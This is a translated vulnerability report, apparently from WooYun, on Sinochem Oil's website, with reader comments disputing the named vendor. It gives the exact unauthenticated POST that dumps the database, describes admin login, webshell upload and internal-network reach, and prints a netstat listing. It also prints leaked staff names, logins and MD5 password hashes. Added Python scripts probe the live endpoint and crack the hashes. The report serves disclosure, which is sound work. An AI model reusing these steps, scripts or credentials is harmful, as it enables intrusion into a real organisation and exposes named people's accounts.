2015-07-05: Details sent to the vendor; awaiting vendor handling
2015-07-09: Vendor confirmed; details disclosed to the vendor only
2015-07-19: Details disclosed to core white hats and experts in the relevant field
2015-07-29: Details disclosed to regular white hats
2015-08-08: Details disclosed to intern white hats
2015-08-23: Details disclosed to the public
Sinopec: arbitrary download of the database file (hundreds of thousands of records leaked) leads to admin backend login and Getshell (internal network reachable). Security is a whole.
China National Chemical Corporation, Sinochem Group (hereafter "Sinochem"), is one of China's four national oil companies, and Sinochem Oil is one of the main vehicles through which the Group runs its petroleum business. Building on more than sixty years in the oil business, Sinochem Oil draws on its resources, channels and operational strengths in domestic and international markets, actively supplies the petroleum resources that economic and social development requires, and takes part in building the national strategic petroleum reserve system; it has become an important member of China's petroleum supply security system.
The problem is in this script:
http://www.sinochemoil.com/esbclient/database/datebase_back.php
The relevant code:
if($_POST['_task']=='doDataBackup'){
    global $DBCfg,$config;
    /*
    $conn=@mysql_pconnect($DBCfg['server'],$DBCfg['user'],$DBCfg['pass']);
    mysql_select_db($DBCfg['database'],$conn);
    */
    $tables=array();
    $a=0;
    $conn=@mysql_pconnect($DBCfg['server'],$DBCfg['user'],$DBCfg['pass']);
    mysql_select_db($DBCfg['database'],$conn);
    //....
    $saveto = $_POST["location"];
    $back_mode = 'all';
    // file name used for the saved data
    $local_filename=$prefix.date('Y_m_d_H-i-s').".sql";
    $filename = "../../db/back/".$prefix.date('Y_m_d_H-i-s').".sql"; // file name when saved on the server
    if($saveto == "local"){
        //...
        header ("Content-Disposition: attachment; filename=$local_filename");
        echo $sqldump;
        exit;
    }
    if($saveto == "server"){
        //...
    }
}
The handler never checks who is calling it: there is no session or role check and no CSRF token, and the only inputs it reads are $_POST['_task'] and $_POST['location']. So it is enough to request the URL above
and POST: _task=doDataBackup&location=local
to be handed the full database dump as a .sql attachment. (Fixing it means gating doDataBackup behind an authenticated administrator session plus a CSRF token, and preferably never streaming the dump back to the browser at all; the server branch also writes into ../../db/back/ with a predictable, timestamp-only file name.)
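As an added check (example code, not from the original report): the Python below sends the same unauthenticated POST and reads only the first few hundred bytes of the response, which is enough to confirm that the handler streams a .sql attachment without copying the whole database off the host. The endpoint and the two form fields come from the report; PEEK_BYTES, the assess() heuristics and the fake_fetch stand-in response are assumptions made for illustration.

```python
"""Confirm an unauthenticated database-backup download by peeking at the response.

Added example, not code from the original report. ENDPOINT and the POST body
are taken from the report; PEEK_BYTES, assess() and fake_fetch are assumptions.
"""
import urllib.parse
import urllib.request

ENDPOINT = "http://www.sinochemoil.com/esbclient/database/datebase_back.php"
PROBE_BODY = urllib.parse.urlencode({"_task": "doDataBackup", "location": "local"}).encode()
PEEK_BYTES = 512  # enough to prove the leak; deliberately not enough to copy the database

# Strings a MySQL dump begins with or contains very early (assumption: typical mysqldump-style output).
SQL_MARKERS = (b"-- MySQL dump", b"CREATE TABLE", b"INSERT INTO", b"DROP TABLE")


def header(headers, name):
    """Case-insensitive header lookup over a plain dict of response headers."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return ""


def assess(status, headers, body_head):
    """Decide whether a response is the streamed dump the handler emits for location=local.

    The vulnerable code sets 'Content-Disposition: attachment; filename=<prefix><timestamp>.sql'
    and echoes the dump, so we require a 200, an attachment named *.sql, and SQL in the body head.
    """
    disposition = header(headers, "Content-Disposition")
    filename = ""
    if "filename=" in disposition:
        filename = disposition.split("filename=", 1)[1].strip().strip('"')
    sql_like = any(marker in body_head for marker in SQL_MARKERS)
    leaked = (
        status == 200
        and "attachment" in disposition.lower()
        and filename.lower().endswith(".sql")
        and sql_like
    )
    return {"leaked": leaked, "filename": filename, "sql_like": sql_like}


def probe(url=ENDPOINT, fetch=None):
    """POST the trigger with no cookies and assess only the first PEEK_BYTES bytes of the body."""
    if fetch is None:
        def fetch(target, body):
            req = urllib.request.Request(
                target, data=body, method="POST",
                headers={"Content-Type": "application/x-www-form-urlencoded"},
            )
            with urllib.request.urlopen(req, timeout=15) as resp:
                return resp.status, dict(resp.headers.items()), resp.read(PEEK_BYTES)
    status, headers, head = fetch(url, PROBE_BODY)
    return assess(status, headers, head)


def fake_fetch(_url, body):
    """Constructed response shaped like the vulnerable handler's output, for offline runs."""
    assert body == PROBE_BODY
    headers = {"Content-Disposition": "attachment; filename=2015_07_05_10-11-12.sql"}
    return 200, headers, b"-- MySQL dump\nCREATE TABLE `sys_user` (\n  `id` int(11) NOT NULL\n);\n"


if __name__ == "__main__":
    # Offline demonstration; pass fetch=None to probe a host you are authorized to test.
    print(probe(fetch=fake_fetch))
```

The important design choice is PEEK_BYTES: proving the bug needs the Content-Disposition header and a few lines of SQL, not the hundreds of thousands of rows behind it.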
Hundreds of thousands of records:
The main site turns out to have a large number of sub-sites:
Administrator accounts of every kind in the database:
The super administrator's password is an unsalted MD5 hash, recovered by lookup:
Getshell:
http://www.sinochemoil.com/file
[screenshot: https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/2015/07/05/1436273514.PHP]
The internal network is reachable from the host:
3389 is listening:
TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING
TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING
TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING
TCP    10.6.22.2:80           61.153.219.214:10765   ESTABLISHED
TCP    10.6.22.2:80           61.153.219.214:34917   ESTABLISHED
TCP    10.6.22.2:80           61.153.219.214:37650   ESTABLISHED
TCP    10.6.22.2:80           61.153.219.214:54544   ESTABLISHED
TCP    10.6.22.2:80           61.153.219.214:57965   ESTABLISHED
TCP    10.6.22.2:80           61.153.219.214:58851   ESTABLISHED
TCP    10.6.22.2:80           66.249.75.103:41740    ESTABLISHED
TCP    10.6.22.2:80           66.249.75.119:34184    ESTABLISHED
TCP    10.6.22.2:80           175.25.28.41:5891      ESTABLISHED
TCP    10.6.22.2:139          0.0.0.0:0              LISTENING
TCP    [::]:80                [::]:0                 LISTENING
TCP    [::]:135               [::]:0                 LISTENING
TCP    [::]:445               [::]:0                 LISTENING
TCP    [::]:3306              [::]:0                 LISTENING
TCP    [::]:3389              [::]:0                 LISTENING
TCP    [::]:47001             [::]:0                 LISTENING
TCP    [::]:49152             [::]:0                 LISTENING
TCP    [::]:49153             [::]:0                 LISTENING
TCP    [::]:49154             [::]:0                 LISTENING
TCP    [::]:49155             [::]:0                 LISTENING
TCP    [::]:49156             [::]:0                 LISTENING
TCP    [::]:49157             [::]:0                 LISTENING
UDP    0.0.0.0:123            *:*
UDP    0.0.0.0:500            *:*
UDP    0.0.0.0:4500           *:*
UDP    0.0.0.0:5355           *:*
UDP    10.6.22.2:137          *:*
UDP    10.6.22.2:138          *:*
UDP    [::]:123               *:*
UDP    [::]:500               *:*
UDP    [::]:4500              *:*
The host has a private address (10.6.22.2) with SMB (445), MySQL (3306) and RDP (3389) bound on all interfaces, so a shell here is a pivot point into the internal network, not just a defaced web server.
A full-featured webshell can be uploaded.
There is even an FCKeditor instance, which makes the exposure worse:
Since the database holds the administrator accounts and password hashes of every sub-site, they could be logged into one by one; this was not tested further.
INSERT INTO sys_user VALUES('1','1','0','1','超级管理员','admin','e867d2021a99d801ef254ad958341d60','1','0000-00-00','1','0000-00-00 00:00:00');
INSERT INTO sys_user VALUES('17','13','0','999','肖斌','xiaobin','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:58:20');
INSERT INTO sys_user VALUES('22','15','0','999','张文舟','zhangwenzhou','1d2aeacbfd1d099b4ab41fa9caf3eae4','1','0000-00-00','1','2013-10-28 10:02:07');
INSERT INTO sys_user VALUES('15','17','0','999','陈涛','chentao','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:57:39');
INSERT INTO sys_user VALUES('16','12','0','999','张亚非','zhangyafei','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:58:05');
INSERT INTO sys_user VALUES('14','16','0','999','王雪','wangxue','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:57:13');
INSERT INTO sys_user VALUES('12','21','0','999','赵伟','zhaowei','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-24 13:34:51');
INSERT INTO sys_user VALUES('13','22','0','999','天津栏目管理员','test','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-24 13:48:27');
INSERT INTO sys_user VALUES('24','23','0','999','一级审批人员','check1','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-28 10:11:36');
INSERT INTO sys_user VALUES('19','20','0','999','田安涛','tianantao','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 09:57:14');
INSERT INTO sys_user VALUES('20','19','0','999','吴朦','wumeng','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 09:58:23');
INSERT INTO sys_user VALUES('21','18','0','999','王坚','wangjian','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 09:58:58');
INSERT INTO sys_user VALUES('23','14','0','999','殷兵','xuebing','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 10:02:39');
INSERT INTO sys_user VALUES('25','23','0','999','二级审批人','check2','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-28 10:12:00');
INSERT INTO sys_user VALUES('26','22','0','999','gggg','123','202cb962ac59075b964b07152d234b70','1','0000-00-00','12','2013-10-28 15:14:01');
INSERT INTO sys_user VALUES('28','26','0','999','顾海燕','guhaiyan','202cb962ac59075b964b07152d234b70','1','0000-00-00','15','2013-11-20 15:26:27');
INSERT INTO sys_user VALUES('29','1','0','999','汪光应','wgy','25cd2bede9a2f491f217b8454a6d0d6e','1','0000-00-00','1','2013-12-02 17:45:20');
INSERT INTO sys_user VALUES('30','28','0','999','佟婷婷','tongtt','e10adc3949ba59abbe56e057f20f883e','1','0000-00-00','21','2013-12-25 12:33:34');
INSERT INTO sys_user VALUES('31','15','0','999','徐岭','xuling','e10adc3949ba59abbe56e057f20f883e','1','0000-00-00','22','2014-01-07 16:00:59');
INSERT INTO sys_user VALUES('32','31','0','999','应红枫','yinghongfeng','1d2aeacbfd1d099b4ab41fa9caf3eae4','1','0000-00-00','22','2014-01-08 15:20:20');
INSERT INTO sys_user VALUES('33','33','0','999','李凤云','lifengyun','202cb962ac59075b964b07152d234b70','1','0000-00-00','22','2014-01-08 15:21:26');
INSERT INTO sys_user VALUES('34','34','0','999','曾诚','zengcheng','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2014-01-10 17:22:00');
INSERT INTO sys_user VALUES('36','1','0','999','elongtian','elongtian','85f2a5c45c7ce8b1dee48f9f484a0e49','1','0000-00-00','1','2014-10-20 16:15:25');
INSERT INTO sys_user VALUES('37','1','0','999','迦兰密语','Hacker','e23c1f69ced8de2d94a87fd904357c22','1','0000-00-00','1','2015-01-29 11:15:00'
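The "decrypt the MD5" step above works because sys_user stores bare, unsalted MD5 and most rows share one hash: 202cb962ac59075b964b07152d234b70 is MD5("123") and e10adc3949ba59abbe56e057f20f883e is MD5("123456"), so a single precomputed table covers the whole user table at once. The Python below, added here as an example and not part of the original report, parses sys_user INSERT rows in the dump's format (including rows broken across lines, as in the quoted dump) and audits them against a small trivial-password list. The sample rows are constructed with placeholder names; the column positions are an assumption inferred from the quoted rows, and TRIVIAL_WORDLIST is an assumption too.

```python
"""Audit a leaked sys_user dump for unsalted-MD5 passwords that fall to a trivial wordlist.

Added example, not code from the original report. Column positions are assumed
from the sys_user rows quoted in the report; the sample rows are constructed.
"""
import hashlib
import re
from collections import defaultdict

# Assumed layout of a sys_user row: (id, group, ?, rank, display name, login, md5, ...).
COL_DISPLAY_NAME, COL_USERNAME, COL_PASSWORD_MD5 = 4, 5, 6

# re.S lets a row span physical lines, as in the dump quoted above; a literal ");"
# inside a quoted value would confuse this (assumption: none in the sample).
ROW_RE = re.compile(r"INSERT INTO sys_user VALUES\s*\((.*?)\);", re.S)
VALUE_RE = re.compile(r"'((?:[^'\\]|\\.)*)'")
MD5_RE = re.compile(r"^[0-9a-f]{32}$")

# Assumed wordlist; unsalted MD5 means one table of len(wordlist) hashes covers every account.
TRIVIAL_WORDLIST = ["123", "123456", "password", "admin", "admin123", "111111", "123123"]

STRONG_HASH = hashlib.md5(b"v7!Qz#pL2m@wR9").hexdigest()  # constructed: not in the wordlist

# Constructed sample in the dump's format; the 123 / 123456 hashes are the ones from the leak,
# 5f4dcc3b... is MD5("password"), and the last row is split across lines like the quoted dump.
SAMPLE_DUMP = f"""
INSERT INTO sys_user VALUES('1','1','0','1','Super Admin','admin','{STRONG_HASH}','1','0000-00-00','1','0000-00-00 00:00:00');
INSERT INTO sys_user VALUES('17','13','0','999','User A','usera','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-26 13:58:20');
INSERT INTO sys_user VALUES('22','15','0','999','User B','userb','202cb962ac59075b964b07152d234b70','1','0000-00-00','1','2013-10-28 10:02:07');
INSERT INTO sys_user VALUES('30','28','0','999','User C','userc','e10adc3949ba59abbe56e057f20f883e','1','0000-00-00','21','2013-12-25 12:33:34');
INSERT INTO sys_user VALUES('31','15','0','999','User D','userd','5f4dcc3b5aa765d61d8327deb882cf99','1','0000-00-00','22','2014-01-07 
16:00:59');
"""


def parse_sys_user(dump_text):
    """Extract display name, login and password hash from every complete sys_user INSERT."""
    rows = []
    for match in ROW_RE.finditer(dump_text):
        values = VALUE_RE.findall(match.group(1))
        if len(values) <= COL_PASSWORD_MD5:
            continue  # truncated or malformed row: skip rather than misattribute columns
        rows.append({
            "display_name": values[COL_DISPLAY_NAME],
            "username": values[COL_USERNAME],
            "password_md5": values[COL_PASSWORD_MD5].lower(),
        })
    return rows


def build_lookup(wordlist):
    """Precompute MD5 for each candidate; with no salt this table is computed once, ever."""
    return {hashlib.md5(word.encode()).hexdigest(): word for word in wordlist}


def audit(rows, wordlist=TRIVIAL_WORDLIST):
    """Report cracked logins, uncracked logins, and hashes shared by more than one account."""
    lookup = build_lookup(wordlist)
    cracked, uncracked, by_hash = {}, [], defaultdict(list)
    for row in rows:
        digest = row["password_md5"]
        if not MD5_RE.match(digest):
            uncracked.append(row["username"])  # not MD5-shaped: some other scheme, leave it
            continue
        by_hash[digest].append(row["username"])
        if digest in lookup:
            cracked[row["username"]] = lookup[digest]
        else:
            uncracked.append(row["username"])
    # Identical hashes mean identical passwords: visible at a glance only because there is no salt.
    shared = {digest: users for digest, users in by_hash.items() if len(users) > 1}
    return {"cracked": cracked, "uncracked": uncracked, "shared": shared}


if __name__ == "__main__":
    report = audit(parse_sys_user(SAMPLE_DUMP))
    for user, plaintext in report["cracked"].items():
        print(f"{user}: {plaintext}")
    print("uncracked:", report["uncracked"])
    print("shared hashes:", report["shared"])
```

The shared-hash grouping is the part worth keeping: even for an account whose password is not in the wordlist, an identical digest on another account tells you the two share a password, which is exactly the "log into each sub-site in turn" risk the report describes.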
Privileges proven.
Security is a whole: a thousand-mile dike collapses from an ant hole.
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-07-09 15:37
CNVD confirmed and reproduced the described situation; it has been forwarded via CNCERT to the energy-sector informatization authority, which will coordinate remediation with the website's operating unit.
None yet
Unable to confirm the vulnerability status; could you provide the vulnerability information?
@中国石油化工股份有限公司 The vulnerability details already describe the vulnerability information~
@Mr.Q The wrong vendor was selected
Er...
......This isn't Sinopec's official site; the vendor doesn't match!
@_Thorns I didn't pick this vendor in the first place... didn't you see it's being handled by CNVD?
Wasn't this submitted before?